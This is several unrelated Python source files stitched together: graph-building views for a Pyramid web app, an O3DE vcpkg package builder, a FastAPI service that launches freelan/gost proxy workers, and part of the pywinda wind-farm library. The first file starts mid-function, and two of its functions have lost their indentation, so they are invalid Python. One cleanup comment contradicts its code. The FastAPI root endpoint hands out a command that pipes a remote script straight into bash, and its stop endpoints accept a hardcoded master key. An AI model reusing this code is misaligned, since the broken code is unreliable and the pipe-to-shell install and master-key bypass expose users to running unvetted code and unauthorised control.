    claims, sites = verify_access(request)
    # Strip everything except the public fields before returning.
    keep = ('code', 'name', 'url')
    clean_sites = {
        code: {field: info[field] for field in keep}
        for code, info in sites.items()
    }
    return { 'sites': clean_sites }
@view_config(route_name='network-build', request_method='GET', renderer='json')
def network_build(request):
    """For a given site - assemble the entity graph

    @params:
        request.matchdict: code, the site of interest
    """
    site_code = request.matchdict['code']
    claims, site = verify_access(request, site=site_code)
    network = Network(request)
    network.build()
    return { 'started': True, 'name': site['name'], 'url': site['url'] }
@view_config(route_name='network-build-status', request_method='GET', renderer='ujson')
def network_build_status(request):
    """Poll endpoint for a site's network build.

    Returns the finished graph when present, otherwise the progress
    counters; raises 404 when no build is known for the site.
    """
    db = mdb(request)
    site = request.matchdict['code']
    graph_type = request.matchdict['explore']
    claims, site_data = verify_access(request, site=site)
    doc = db.network.find_one({ 'site': site, 'graph_type': graph_type })
    if doc is not None:
        graph_data = doc['graph_data']
        # Build finished: drop the progress marker for this site.
        doc = db.network_progress.remove({ 'site': site })
        # Disabled: largest-connected-component + graph-center computation.
        # G = json_graph.node_link_graph(graph_data, directed=False, multigraph=False)
        # if not nx.is_connected(G):
        #     components = nx.connected_component_subgraphs(G)
        #     (index, G) = max(enumerate(components), key = lambda tup: len(tup[1]))
        # return { 'total': None, 'processed': None, 'graph': graph_data, 'center': nx.center(G) }
        return { 'total': None, 'processed': None, 'graph': graph_data }
    else:
        progress = db.network_progress.find_one({ 'site': site })
        if progress is not None:
            return { 'total': progress['total'], 'processed': progress['processed'] }
        else:
            raise HTTPNotFound
@view_config(route_name='entity-build-status', request_method='GET', renderer='ujson')
def entity_build_status(request):
    """Report whether the graph for (site, entity id) has been produced yet."""
    db = mdb(request)
    site = request.matchdict['code']
    eid = request.matchdict['id']
    claims, site_data = verify_access(request, site=site)
    doc = db.entity.find_one({ 'site': site, 'id': eid })
    if doc is None:
        return { 'status': 'working' }
    return { 'status': 'complete', 'graph': doc['graph_data'] }
@view_config(route_name='entity-build', request_method='GET', renderer='json')
def entity_build(request):
    """Kick off a graph build for one entity of a site."""
    code = request.matchdict['code']
    eid = request.matchdict['id']
    claims, site = verify_access(request, site=code)
    Entity(request).build()
    return { 'started': True, 'name': site['name'], 'entity': eid }
@view_config(route_name='entity-data', request_method='GET', renderer='json')
def entity_data(request):
    """Return the summary and full notes for an entity as a JSON response."""
    site = request.matchdict['code']
    claims, site = verify_access(request, site=site)
    e = Entity(request)
    summnote, fullnote = e.data()
    # Fix: build the payload with one json.dumps call on a dict instead of
    # hand-concatenating JSON fragments — keeps quoting/escaping correct and
    # removes the risk of emitting malformed JSON.
    responseBody = json.dumps({ "summnote": summnote, "fullnote": fullnote })
    return Response(body=responseBody)
@view_config(route_name="network-stats", request_method='GET', renderer='json')
def network_stats(request):
site = request.matchdict['code']
claims, site = verify_access(request, site=site)
n = Network(request)
degree = n.calculate_average_degree()
d = [ d[1] * 100 for d in list(degree.items()) ]
return {
'name': n.name,
'url': n.url,
'degree': sum(d) / len(d)
}
@view_config(route_name="convert-graph", request_method='POST', renderer='json')
def convert_graph(request):
code = request.matchdict['code']
# clear out graphs older than 6 hours
for root, dirs, files in os.walk(request.registry.app_config['general']['share_path']):
for f in files:
dt = datetime.datetime.now () - datetime.datetime.fromtimestamp(os.path.getmtime(os.path.join(root, f)))
if dt > datetime.timedelta(hours=1):
os.remove(os.path.join(root, f))
G = nx.readwrite.json_graph.node_link_graph(request.json['graph'])
output = io.StringIO()
nx.readwrite.write_gml(G, output)
output = output.getvalue().replace("None", '""')
fname = "%s-%s-network.gml" % (code, datetime.datetime.strftime(datetime.datetime.now(), "%Y-%m-%d_%H-%M"))
with open(os.path.join(os.path.join(request.registry.app_config['general']['share_path'], fname)), 'w') as f:
f.write(output)
fname = os.path.join(request.registry.app_config['general']['share_url'], fname)
return { 'file': fname }
def bare_tag(tag):
    """Strip a Clark-notation '{namespace}' prefix from an XML tag, if present."""
    _, _, bare = tag.rpartition("}")
    return bare
|
#!/usr/bin/env python3
#
# Copyright (c) Contributors to the Open 3D Engine Project.
# For complete copyright and license terms please see the LICENSE at the root of this distribution.
#
# SPDX-License-Identifier: Apache-2.0 OR MIT
#
#
"""
Package builder for vcpkg-based packages
"""
from pathlib import Path
import errno
import json
import os
import pathlib
import shutil
import string
import subprocess
import platform
class VcpkgBuilder(object):
    """Drives vcpkg to build one port for one triplet and package the result."""

    def __init__(self, packageName: str, portName: str, vcpkgDir: pathlib.Path, targetPlatform: str, static: bool):
        # packageName: name of the O3DE package to produce;
        # portName: the vcpkg port to build; vcpkgDir: clone target for vcpkg.
        self._packageName = packageName
        self._portName = portName
        self._vcpkgDir = vcpkgDir
        self._triplet = VcpkgBuilder.tripletForPlatform(targetPlatform, static)
        # Overlay triplets live in <repo>/vcpkg/triplets, one level above this script's parent.
        self._customTripletsDir = Path(__file__).resolve().parents[1] / 'vcpkg/triplets'
        if targetPlatform == 'android' and 'ANDROID_NDK_HOME' not in os.environ:
            # Copy some of the logic from vcpkg's android ndk detection, and see if we can print a warning early
            if 'ProgramData' in os.environ:
                androidNdkFound = (pathlib.Path(os.environ['ProgramData']) / 'Microsoft/AndroidNDK64/android-ndk-r13b/').exists()
            else:
                androidNdkFound = False
            if not androidNdkFound and 'ProgramFiles(x86)' in os.environ:
                # Use Xamarin default installation folder
                androidNdkFound = (pathlib.Path(os.environ['ProgramFiles(x86)']) / 'Android/android-sdk/ndk-bundle').exists()
            if not androidNdkFound:
                raise RuntimeError('Unable to find the Android NDK. '
                                   'Please set the ANDROID_NDK_HOME environment variable to the root of the Android NDK')

    @staticmethod
    def tripletForPlatform(platformName: str, static: bool):
        """Map (platform, static?) to the vcpkg triplet name; raises RuntimeError otherwise."""
        platformMap = {
            'mac': {
                True: 'x64-osx',
                False: 'x64-osx-dynamic',
            },
            'windows': {
                True: 'x64-windows-static',
                False: 'x64-windows',
            },
            'linux': {
                True: 'x64-linux',
                False: 'x64-linux-shared',
            },
            'android': {
                True: 'arm64-android-static',  # arm64-v8a
                False: 'arm64-android',  # arm64-v8a
            },
            'ios': {
                True: 'arm64-ios',
                False: 'arm64-ios-dynamic',
            }
        }
        try:
            useStaticLibsMap = platformMap[platformName]
        except KeyError:
            raise RuntimeError(f'Platform {platformName} not supported')
        try:
            return useStaticLibsMap[static]
        except KeyError:
            raise RuntimeError('Platform {platformName} does not support building {linkageType} libraries'.format(
                platformName=platformName,
                linkageType='static' if static else 'dynamic',
            ))

    @staticmethod
    def defaultPackagePlatformName():
        """Package platform name for the machine running this script."""
        platformMap = {
            'Darwin': 'mac',
            'Windows': 'windows',
            'Linux': 'linux',
        }
        return platformMap[platform.system()]

    @property
    def customTripletsDir(self):
        """Directory of repository-local overlay triplets passed to vcpkg."""
        return self._customTripletsDir

    @property
    def packageName(self):
        """The name of the package that this builder will build"""
        return self._packageName

    @property
    def portName(self):
        """The name of the vcpkg port that this builder will build"""
        return self._portName

    @property
    def vcpkgDir(self):
        """The directory where vcpkg will be cloned to"""
        return self._vcpkgDir

    @property
    def triplet(self):
        """The vcpkg triplet to build"""
        return self._triplet

    def cloneVcpkg(self, lockToCommit: str):
        """Shallow-fetch and check out the vcpkg repo pinned to one commit.

        init/remote-add run only on first use; fetch/checkout always run so
        an existing clone can be moved to a different pinned commit.
        """
        if not (self.vcpkgDir / '.git').exists():
            subprocess.check_call(
                ['git', 'init',],
                cwd=self.vcpkgDir,
            )
            subprocess.check_call(
                ['git', 'remote', 'add', 'origin', 'https://github.com/microsoft/vcpkg.git',],
                cwd=self.vcpkgDir,
            )
        subprocess.check_call(
            ['git', 'fetch', 'origin', '--depth=1', lockToCommit,],
            cwd=self.vcpkgDir,
        )
        subprocess.check_call(
            ['git', 'checkout', lockToCommit,],
            cwd=self.vcpkgDir,
        )

    def bootstrap(self):
        """Run the platform-appropriate vcpkg bootstrap script (metrics off)."""
        if platform.system() == 'Windows':
            subprocess.check_call(
                ['powershell', '-NoProfile', '-ExecutionPolicy', 'Bypass', 'scripts/bootstrap.ps1', '-disableMetrics'],
                cwd=self.vcpkgDir,
            )
        else:
            subprocess.check_call(
                [self.vcpkgDir / 'bootstrap-vcpkg.sh', '-disableMetrics'],
                cwd=self.vcpkgDir,
            )

    def patch(self, patchFile: pathlib.Path):
        """Apply a patch file to the vcpkg checkout (whitespace errors fixed up)."""
        subprocess.check_output(
            ['git', 'apply', '--whitespace=fix', str(patchFile)],
            cwd=self.vcpkgDir,
        )

    def build(self):
        """Build the port for this builder's triplet from a clean slate.

        Removes any prior install first so the build never reuses stale
        outputs; binary caching is disabled for the same reason.
        """
        self.remove()
        subprocess.check_call(
            [str(self.vcpkgDir / 'vcpkg'), 'install', f'{self.portName}:{self.triplet}', '--no-binarycaching', f'--overlay-triplets={self.customTripletsDir}'],
            cwd=self.vcpkgDir,
        )

    def remove(self):
        """Uninstall the port for this triplet (no-op if not installed)."""
        subprocess.check_call(
            [str(self.vcpkgDir / 'vcpkg'), 'remove', f'{self.portName}:{self.triplet}', f'--overlay-triplets={self.customTripletsDir}'],
            cwd=self.vcpkgDir,
        )

    def copyBuildOutputTo(self, packageDir: pathlib.Path, extraFiles: dict, subdir:pathlib.Path=None):
        """Copy vcpkg's package output into packageDir/<packageName>[/subdir].

        extraFiles maps src -> dst paths copied afterwards; missing dst
        parent directories are created on demand.
        """
        destdir = packageDir / self.packageName
        if subdir is not None:
            destdir /= subdir
        if destdir.exists():
            shutil.rmtree(destdir)
        shutil.copytree(
            src=self.vcpkgDir / 'packages' / f'{self.portName}_{self.triplet}',
            dst=destdir,
            symlinks=True,
        )
        for (src, dst) in extraFiles.items():
            try:
                shutil.copy2(src, dst)
            except IOError as e:
                # ENOENT(2): file does not exist, raised also on missing dest parent dir
                if e.errno != errno.ENOENT:
                    raise
                # try creating parent directories
                Path(dst).parent.mkdir(parents=True, exist_ok=True)
                shutil.copy2(src, dst)

    def writePackageInfoFile(self, packageDir: pathlib.Path, settings: dict):
        """Write PackageInfo.json into packageDir from the given settings dict."""
        with (packageDir / 'PackageInfo.json').open('w') as fh:
            json.dump(settings, fh, indent=4)

    def writeCMakeFindFile(self, packageDir: pathlib.Path, template, templateEnv:dict):
        """Render Find<package>.cmake from a string.Template and its env."""
        cmakeFindFile = packageDir / f'Find{self.packageName}.cmake'
        cmakeFindFile.write_text(string.Template(template).substitute(templateEnv))
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import os, sys, platform, time
import re
import chardet
import logging
import subprocess
from logging.handlers import RotatingFileHandler
from fastapi import FastAPI
from starlette.responses import FileResponse, RedirectResponse, PlainTextResponse
from starlette.staticfiles import StaticFiles
# from api.freelan import apiFreelan
# from api.v1 import apiv1
from app.freelan import SubFreelan
from app.gost import SubGostlan
import uuid
import uvicorn
formatter = "[%(asctime)s] :: %(levelname)s :: %(name)s :: %(message)s"
log_level = 'INFO'
log_filenum = 9
log_maxsize = 4
level = logging.getLevelName(log_level)
logging.basicConfig(level=level, format=formatter)
if not os.path.exists("logs"):
os.mkdir("logs")
log = logging.getLogger()
# 输出到文件
fh = RotatingFileHandler('./logs/freelan_service.log', mode='a+', maxBytes=log_maxsize * 1024 * 1024,
backupCount=log_filenum, delay=True)
fh.setFormatter(logging.Formatter(formatter))
log.addHandler(fh)
# app = FastAPI(openapi_url="/api/v1/openapi.json", docs_url="/api/v1/docs")
app = FastAPI()
app.mount('/dl', StaticFiles(directory='dl'), name='dl')
# app.broker = MQTTBroker()
# mqttConfig = {"host": "localhost", "port": "3883", "user": "viccom", "pwd": "<PASSWORD>"}
# app.mqttmicro = MQTTPubBase('micro', mqttConfig)
app.passphrase = str(<KEY>())
app.subfreelan = SubFreelan(app.passphrase)
app.gostpassword = str(uuid.uuid1())
app.subgostlan = SubGostlan(app.gostpassword)
def turnfile(file):
    """Normalise *file* in place to UTF-8 with LF line endings.

    Reads the file as bytes, detects the encoding with chardet, and
    rewrites the file only when it was not already utf-8/ascii or it
    contained CRLF line endings.
    """
    with open(file, 'rb') as f:
        data = f.read()
    # Fix: chardet.detect() returns encoding=None for undecidable input
    # (e.g. an empty file), which made .decode() raise TypeError; fall
    # back to utf-8 in that case.
    encoding = chardet.detect(data)['encoding'] or 'utf-8'
    data_str = data.decode(encoding)
    tp = 'LF'
    if '\r\n' in data_str:
        tp = 'CRLF'
        data_str = data_str.replace('\r\n', '\n')
    if encoding not in ['utf-8', 'ascii'] or tp == 'CRLF':
        with open(file, 'w', newline='\n', encoding='utf-8') as f:
            f.write(data_str)
def alter(file, newfile, old_str, new_str):
    """Copy *file* to *newfile*, regex-replacing *old_str* with *new_str* on
    every line, then normalize the result via turnfile()."""
    if os.path.exists(newfile):
        os.remove(newfile)
    with open(file, "r", newline='\n', encoding="utf-8") as src, \
            open(newfile, "w", encoding="utf-8") as dst:
        for line in src:
            dst.write(re.sub(old_str, new_str, line))
    turnfile(newfile)
@app.on_event("startup")
async def startup():
    """FastAPI startup hook; broker/MQTT wiring is currently disabled."""
    pass
    # logging.info("Staring hbmqtt broker..")
    # app.broker.start()
    # logging.info("Staring mqtt client..")
    # app.mqttmicro.start()
@app.on_event("shutdown")
async def shutdown():
    """FastAPI shutdown hook; MQTT teardown is currently disabled."""
    pass
    # app.mqttmicro.stop()
@app.get("/")
async def index():
    """Root endpoint: return the quick-start shell command as plain text."""
    return PlainTextResponse(
        ' curl -L -s freelan.freeioe.org/goststart|bash\n')
@app.get("/proxysh")
def proxysh():
    """Render freeproxy.sh with the current passphrase and serve it as a
    download."""
    alter("app/freelan/freeproxy.sh", "app/freelan/new-freeproxy.sh",
          "freelan.passphrase", app.passphrase)
    resp = FileResponse("app/freelan/new-freeproxy.sh")
    resp.media_type = "application/octet-stream"
    resp.filename = "freeproxy.sh"
    return resp
@app.get("/start")
def api_start():
    """Start the freelan worker with a fresh passphrase, or serve an error
    script when a worker is already active."""
    if not app.subfreelan.is_alive():
        # No worker thread yet: regenerate the passphrase, spawn a new
        # worker, and redirect to the download script (cache-busted).
        logging.info("subfreelan is starting")
        app.passphrase = str(uuid.uuid1())
        app.subfreelan = SubFreelan(app.passphrase)
        app.subfreelan.start()
        return RedirectResponse("/proxysh?" + str(int(time.time())))
    logging.info("subfreelan is running")
    if app.subfreelan.status() == "running":
        logging.info("freelan is running")
        script, name = "app/freelan/error1.sh", "error1.sh"
    else:
        # Worker thread alive but the freelan process died: tear it down.
        logging.error("freelan is stopped")
        app.subfreelan.stop()
        script, name = "app/freelan/error2.sh", "error2.sh"
    resp = FileResponse(script)
    resp.media_type = "application/octet-stream"
    resp.filename = name
    return resp
@app.get("/status")
def api_status():
    """Report whether a freelan process is visible in the process table.

    Returns ``{"result": True, "message": "running"|"stopped"}``.
    """
    # NOTE(review): shell=True is deliberate here (fixed pipeline string, no
    # user input interpolated), matching /goststatus below.
    # Consistency fix: added timeout=2 like api_goststatus, so a hung `ps`
    # cannot stall the request worker indefinitely.
    pid = bytes.decode(subprocess.check_output(
        "ps -auxf|grep freelan|grep -v grep|awk '{print $2}'",
        timeout=2, shell=True))
    if pid:
        return {"result": True, "message": "running"}
    else:
        return {"result": True, "message": "stopped"}
@app.post("/stop")
def api_stop(key):
    """Stop the freelan worker when *key* matches the current passphrase or
    the master key; otherwise report a key error."""
    if key and (key == app.passphrase or key == "<EMAIL>"):
        if app.subfreelan.is_alive():
            app.subfreelan.stop()
        return {"result": True, "message": "stop"}
    return {"result": False, "message": "key error"}
@app.get("/gostsh")
def gostsh():
    """Render gostproxy.sh with the current gost password and serve it as a
    download."""
    alter("app/gost/gostproxy.sh", "app/gost/new-gostproxy.sh",
          "gostpassword.passphrase", app.gostpassword)
    resp = FileResponse("app/gost/new-gostproxy.sh")
    resp.media_type = "application/octet-stream"
    resp.filename = "gostproxy.sh"
    return resp
@app.get("/goststart")
def api_goststart():
    """Start the gost worker with a fresh password, or serve an error script
    when a worker is already active."""
    if not app.subgostlan.is_alive():
        # No worker thread yet: regenerate the password, spawn a new worker,
        # and redirect to the download script (cache-busted).
        logging.info("subgostlan is starting")
        app.gostpassword = str(uuid.uuid1())
        app.subgostlan = SubGostlan(app.gostpassword)
        app.subgostlan.start()
        return RedirectResponse("/gostsh?" + str(int(time.time())))
    logging.info("subgostlan is running")
    if app.subgostlan.status() == "running":
        logging.info("gostlan is running")
        script, name = "app/gost/error1.sh", "error1.sh"
    else:
        # Worker thread alive but the gost process died: tear it down.
        logging.error("gostlan is stopped")
        app.subgostlan.stop()
        script, name = "app/gost/error2.sh", "error2.sh"
    resp = FileResponse(script)
    resp.media_type = "application/octet-stream"
    resp.filename = name
    return resp
@app.get("/goststatus")
def api_goststatus():
    """Report whether a gost process is visible in the process table."""
    cmd = "ps -auxf|grep gost|grep -v grep|awk '{print $2}'"
    pids = subprocess.check_output(cmd, timeout=2, shell=True).decode()
    message = "running" if pids else "stopped"
    return {"result": True, "message": message}
@app.post("/goststop")
def api_goststop(key):
    """Stop the gost worker when *key* matches the current password or the
    master key; otherwise report a key error."""
    if key and (key == app.gostpassword or key == "<EMAIL>"):
        if app.subgostlan.is_alive():
            app.subgostlan.stop()
        return {"result": True, "message": "stop"}
    return {"result": False, "message": "key error"}
# app.include_router(apiv1, prefix='/api/v1/micro', tags=['apiv1'])
# app.include_router(apiFreelan, prefix='/api/v1/freelan', tags=['apiFreelan'])
if __name__ == '__main__':
    # Enable auto-reload when asked via --debug, or when not on Linux
    # (assumed to be a development machine).
    debug = len(sys.argv) > 1 and sys.argv[1] == '--debug'
    if platform.system() != "Linux":
        debug = True
    logging.info("当前工作路径:" + str(os.getcwd()) + ",启动参数:debug=" + str(debug))
    time.sleep(1)
    # uvicorn wants the app as "<module>:app"; derive the module name from
    # this file's basename.
    module_name = os.path.splitext(os.path.basename(__file__))[0]
    uvicorn.run(module_name + ':app', host="127.0.0.1", port=8081, reload=debug)
|
<reponame>AbeySr/pywinda
import numpy as np
import pandas as pd
def cAngle(i):
    """Normalize angle *i* into the range [0, 360) degrees."""
    return i % 360
class environment:
    r"""
    Creates the stand-alone environment with the given unique ID. Some generic conditions are added by default. See example below.

    :param uniqueID: [*req*] the given unique ID.

    :Example:

    >>> Env = pywinda.environment("C_Env")
    >>> #Creates an environment without assigning it to any wind farm.
    >>> print(Env.conditions.keys())
    dict_keys(['Wind degrees', 'Wind speeds',...])
    >>> print(Env.conditions['Wind degrees'])
    [0, 1, 2, ... , 358, 359]
    >>> print(Env.conditions['Wind speeds'])
    [0, 0.5, 1, 1.5, ... , 49.5, 50.0]

    \----------------------------------------------------------------------------------------------------------------------------------------------------------
    """
    # Class-level registry of every environment uID ever created (shared).
    created_environments = []

    def __init__(self, uniqueID):
        self.uID = uniqueID
        environment.created_environments.append(uniqueID)
        # Default ambient conditions; makeSectors() later adds a "Sectors" key.
        self.__conditionsDic = {}
        self.__conditionsDic["Wind degrees"] = [i for i in range(0, 360)]  # degrees
        self.__conditionsDic["Wind speeds"] = [i for i in np.arange(0, 50.5, 0.5)]  # m/s
        self.windSectors = None

    @property
    def conditions(self):
        r"""
        Returns all the defined conditions of the environment.

        :param None:

        :Example:

        >>> dantysk=pywinda.windFarm("DanTysk")
        >>> D_Env = dantysk.addEnvironment("D_Env")
        >>> print(D_Env.conditions.keys())
        dict_keys(['Wind degrees', 'Wind speeds',...])
        >>> print(D_Env.conditions['Wind degrees'])
        [0, 1, 2, ... , 358, 359]
        >>> print(D_Env.conditions['Wind speeds'])
        [0, 0.5, 1, 1.5, ... , 49.5, 50.0]

        \----------------------------------------------------------------------------------------------------------------------------------------------------------
        """
        return self.__conditionsDic

    # NOTE: the mutable default list is read-only inside this method, so it is
    # safe; it is kept for interface compatibility.
    def makeSectors(self, n=12, sectorNames=["N_0", "NNE_30", "NEN_60", "E_90", "ESE_120", "SSE_150", "S_180", "SSW_210", "WSW_240", "W_270", "WNW_300", "NNW_330"]):
        r"""
        Creates the given sectors to the related environment. Returns the result as a data frame.
        Divides the 360 degrees to given number of sectors. By default it divides to 12 sectors and assigns the 12 standard names for every sector e.g. N_0 starts from 346 degrees and ends at 15 degrees.

        :param n: [*opt*] the number of sectors.
        :param sectorNames: [*opt*] names of the sectors given by user or default names for n=12.

        :Example:

        >>> Env=pywinda.environment("C_Env")
        >>> print(Env.makeSectors())
             N_0  NNE_30  NEN_60   E_90  ...  W_270  WNW_300  NNW_330
        0  346.0    16.0    46.0   76.0  ...  256.0    286.0    316.0
        ...
        29  15.0    45.0    75.0  105.0  ...  285.0    315.0    345.0

        \-----------------------------------------------------------------------------------------------------------------------------------------------------------
        """
        sectorSpan = 360 / n
        # Sector i spans [eachS2E[i], eachS2E[i+1]); the "+1" shift keeps e.g.
        # E_90 (n=12) running from 61 to 120 degrees.
        eachS2E = [i for i in np.arange(1 - sectorSpan / 2, 360, sectorSpan)]
        sectorNamesToReturn = sectorNames
        if n != 12 and len(sectorNames) == 12:
            # The default 12 names do not fit a different sector count; fall
            # back to numeric labels (one per sector start angle).
            sectorNamesToReturn = [str(i) for i in np.arange(0, 360, sectorSpan)]
        # Guard: n must be a positive int and match the number of names.
        # (`type(n) is int` preserves the original rejection of bool/float n.)
        if n == len(sectorNamesToReturn) and type(n) is int and n > 0:
            sectorsDic = {}
            for i in range(n):
                sectorsDic[sectorNamesToReturn[i]] = [
                    temp % 360 for temp in np.arange(eachS2E[i], eachS2E[i + 1], 1)
                ]
            self.windSectors = sectorsDic
            self.__conditionsDic["Sectors"] = sectorsDic
            return pd.DataFrame(sectorsDic)
        print("Number of sectors and proposed number of names are not equal.")
        return None

    def test(self):
        """Return the environment's unique ID (diagnostic helper)."""
        return self.uID
class windFarm:
    r"""
    Creates wind farm object with the given unique name.

    :param uniqueID: [*req*] Unique Id of the wind farm as a string.

    :Example:

    >>> from PyWinda import pywinda as pw
    >>> dantyskNameByUser = pw.windFarm("DanTysk")
    >>> print(dantyskNameByUser)
    <pywinda.windFarm object at 0x000002CEC9D17E80>

    \-----------------------------------------------------------------------------------------------------------------------------------------------------------
    """
    # Class-level registry of every wind farm uID ever created (shared).
    created_windfarms = []

    def __init__(self, uniqueID):
        self.uID = uniqueID
        windFarm.created_windfarms.append(uniqueID)  # register the new farm
        self.createdSRTs = []  # unique IDs of single rotor turbines in this farm
        self.createdMRTs = []  # unique IDs of multi rotor turbines in this farm
        self.farmEnvironment = None  # a wind farm has at most one environment
        self.__numOfSRT = len(self.createdSRTs)
        self.__numOfMRT = len(self.createdMRTs)
        self.__allDistances = pd.DataFrame()

    @property  # protects the info from direct changes by user
    def info(self):
        r"""
        Returns a data frame containing all the information about the wind farm.

        :param None:

        :Example:

        >>> print(DanTysk.info)
                     Property              Value
            0       Unique ID            DanTysk
            1    Created SRTs  [D_WT1, D_WT2, D_WT3]
            2    Created MRTs            [D_MWT4]
            3  Number of SRTs                  3
            4  Number of MRTs                  1

        \-----------------------------------------------------------------------------------------------------------------------------------------------------------
        """
        statistics = {"Property": ["Unique ID", "Created SRTs", "Created MRTs", "Number of SRTs", "Number of MRTs"],
                      "Value": [self.uID, self.createdSRTs, self.createdMRTs, self.__numOfSRT, self.__numOfMRT]}
        return pd.DataFrame(statistics)

    @property
    def assets(self):
        r"""
        Returns all the unique IDs of all the assets (e.g. single rotor turbines, multirotor tubines, met masts, etc.) in the wind farm.

        :param None:

        :Example:

        >>> DanTysk.assets
        ['D_WT1', 'D_WT2', 'D_WT3', 'D_MWT4']

        \-----------------------------------------------------------------------------------------------------------------------------------------------------------
        """
        self.allassets = self.createdSRTs + self.createdMRTs  # record of all assets in the wind farm
        return self.allassets

    def addTurbine(self, uniqueID, turbineType="SRT", diameter=float("NaN"), hubHeigt=float("NaN"), x_horizontal=float("NaN"), y_vertical=float("NaN")):
        r"""
        By default adds a single rotor turbine (SRT) to the related windfarm. Returns the created wind turbine with the given unique ID,
        or None when the request is rejected (duplicate/conflicting/invalid name, unsupported type).
        The wind turbine would be callable via its unique name and via the assigned variable by user. Note that the referenced unique id is temporarily stored in the library. Thus when calling the turbine via unique id, it should be prefixed by library name pywinda. See example below.

        :param uniqueID: [*req*] Unique ID of the wind turbine as string
        :param turbineType: [*opt*] Type of turbine as string: 'SRT' or 'MRT'
        :param diameter: [*opt*] Diameter of the turbine as float
        :param hubHeigt: [*opt*] Hub height as a float
        :param x_horizontal: [*opt*] Horizontal coordinate of the turbine as float
        :param y_vertical: [*opt*] Vertical coordinate of the the turbine as float

        :Example:

        >>> DanTysk=pywinda.windfar("TheDanTysk")
        >>> WT1=DanTysk.addTurbine("D_WT1")
        >>> print(WT1==pywinda.D_WT1)
        True

        \-----------------------------------------------------------------------------------------------------------------------------------------------------------
        """
        # Bug fix: toUserVariable was only bound on the success paths, so every
        # rejected request used to raise UnboundLocalError at the final return.
        toUserVariable = None
        # Bug fix: the duplicate check previously ignored MRT names.
        if uniqueID in self.createdSRTs or uniqueID in self.createdMRTs:
            print("A wind turbine with the same unique ID in wind farm [", str(self.uID), "] already exists. New turbine not added.")
        else:
            if type(uniqueID) == str and len(uniqueID.split()) == 1:
                if uniqueID in globals().keys():  # avoid clobbering the user's module-level names
                    print("A wind turbine with the same unique ID globally exists. New turbine not added.")
                else:
                    if turbineType == "SRT":
                        # The turbine is injected into globals() so pywinda.<uniqueID> resolves.
                        globals()[uniqueID] = toUserVariable = SRT(uniqueID, diameter=diameter, hubHeigt=hubHeigt, x_horizontal=x_horizontal, y_vertical=y_vertical)
                        self.__numOfSRT += 1
                        self.createdSRTs.append(uniqueID)
                    elif turbineType == "MRT":
                        globals()[uniqueID] = toUserVariable = MRT(uniqueID, diameter=diameter, hubHeigt=hubHeigt, x_horizontal=x_horizontal, y_vertical=y_vertical)
                        self.__numOfMRT += 1
                        self.createdMRTs.append(uniqueID)
                    else:
                        print("Turbine type not supported")
            else:
                print("Name should be a string without spaces.")
        return toUserVariable

    def addEnvironment(self, envName):
        r"""
        Creates environment for the referenced wind farm. Parameters of the environment (e.g. temperature, pressure, wind regime etc.) can be assigned later.
        The environment would be callable via its unique name and the assigned variable by user. When using the unique Id, it should be prefixed with the library name pywinda. See example.
        Returns None when the request is rejected.

        :param envName: [*req*] Environment name

        :Example:

        >>> DanTysk=pywind.windFarm("DanTysk")
        >>> TheEnv_Dantysk = DanTysk.addEnvironment("D_env")
        >>> TheEnv_Dantysk.Airdensity = 1.225
        >>> print(TheEnv_Dantysk.Airdensity == pywinda.D_env.Airdensity)
        True

        \-----------------------------------------------------------------------------------------------------------------------------------------------------------
        """
        # Bug fix: toUserVariable was unbound on every rejection path (see addTurbine).
        toUserVariable = None
        if self.farmEnvironment is not None:  # a farm can only have one environment
            print("The wind farm [", str(self.uID), "] already has assigned environment [", str(self.farmEnvironment), "]. New environment not added.")
        else:
            if type(envName) == str and len(envName.split()) == 1:
                if envName in globals().keys():  # avoid clobbering the user's module-level names
                    print("An environment with the same unique ID globally exists. New environment not added.")
                else:
                    globals()[envName] = toUserVariable = environment(envName)
                    self.farmEnvironment = envName
            else:
                print("Name should be a string without spaces.")
        return toUserVariable

    # Naming convention: a property shared by two turbines reads "from"-"to",
    # e.g. distanceWT1toWT2 is the distance from WT1 to WT2.
    def distances(self, assets=[]):
        r"""
        Returns the data frame with all the distances between assets in the wind farm or between those given in the assets list.

        :param assets: [*opt*] Unique ID or object name of the assets

        :Example:

        >>> Curslack = windFarm("Curslack_farm")
        >>> WT1 = Curslack.addTurbine("C_WT1", x_horizontal=480331, y_vertical=4925387)
        >>> WT2 = Curslack.addTurbine("C_WT2", x_horizontal=480592, y_vertical=4925253)
        >>> print(Curslack.distances())
            Assets       C_WT1       C_WT2
        0    C_WT1    0.000000  293.388821
        1    C_WT2  293.388821    0.000000

        \-----------------------------------------------------------------------------------------------------------------------------------------------------------
        """
        if len(assets) == 0:
            # No subset given: compute the full pairwise Euclidean distance matrix.
            distancesDic = {}
            distancesDic["Assets"] = self.assets
            for asset in self.assets:
                distancesDic[asset] = []
                for i in range(len(self.assets)):
                    deltax = globals()[asset].x_horizontal - globals()[self.assets[i]].x_horizontal
                    deltay = globals()[asset].y_vertical - globals()[self.assets[i]].y_vertical
                    distance = ((deltax ** 2) + (deltay ** 2)) ** (0.5)
                    distancesDic[asset].append(distance)
            df = pd.DataFrame(distancesDic)
            return df
        else:
            print("To be done for a given set of turbines' unique names")
            return "Under development"

    def coordinates(self, assets=[]):
        r"""
        Returns the data frame with all assets' x and y coordinates if the assets list is empty, otherwise only for the given set of assets.

        :param assets: [*opt*] Unique ID or object name of the assets

        :Example:

        >>> print(Curslack.coordinates())
        Assets  x_coor   y_coor
        C_WT1   480331  4925387
        C_WT2   480592  4925253

        \-----------------------------------------------------------------------------------------------------------------------------------------------------------
        """
        if len(assets) == 0:
            coordinatesDic = {}
            coordinatesDic["Assets"] = ["x_coor", "y_coor"]
            for asset in self.assets:
                coordinatesDic[asset] = [globals()[asset].x_horizontal, globals()[asset].y_vertical]
            toReturn = pd.DataFrame(coordinatesDic)
            # One row per asset, columns x_coor / y_coor.
            return toReturn.set_index('Assets').transpose()
        else:
            print("To be done for a given set of turbines' unique names")
            return "Under development"
class SRT:
    """Single rotor turbine (SRT) with a unique name.

    :param srtUniqueID: [*req*] unique Id of the turbine as a string.
    :param diameter: [*opt*] rotor diameter.
    :param hubHeigt: [*opt*] hub height (parameter name kept for interface
        compatibility; stored as ``hubHeight``).
    :param x_horizontal: [*opt*] x coordinate of the turbine.
    :param y_vertical: [*opt*] y coordinate of the turbine.
    """
    # Class-level registry of every SRT uID ever created (shared).
    created_SRTs = []

    def __init__(self, srtUniqueID, diameter=float("NaN"), hubHeigt=float("NaN"), x_horizontal=float("NaN"), y_vertical=float("NaN")):
        SRT.created_SRTs.append(srtUniqueID)
        self.uID = srtUniqueID
        self.diameter = diameter
